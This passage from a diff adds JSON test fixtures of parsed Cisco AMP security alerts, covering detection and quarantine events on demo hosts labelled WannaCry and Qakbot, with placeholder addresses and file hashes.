"cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 77209, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 927000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 78808, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 79928, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 81129, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 82330, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "igvj$vN.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 83443, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "6951045.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 84690, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "dc41e47ebba549ec5e616ed9e88a0376", + "file.hash.sha1": "99fffe78e0cbd7b508eed13a8633903dd89ed5f1", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 85948, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "dc41e47ebba549ec5e616ed9e88a0376", + "99fffe78e0cbd7b508eed13a8633903dd89ed5f1" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 87312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88505, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 89691, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90884, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 92070, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93256, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 94442, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 95628, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 96814, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 98000, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": 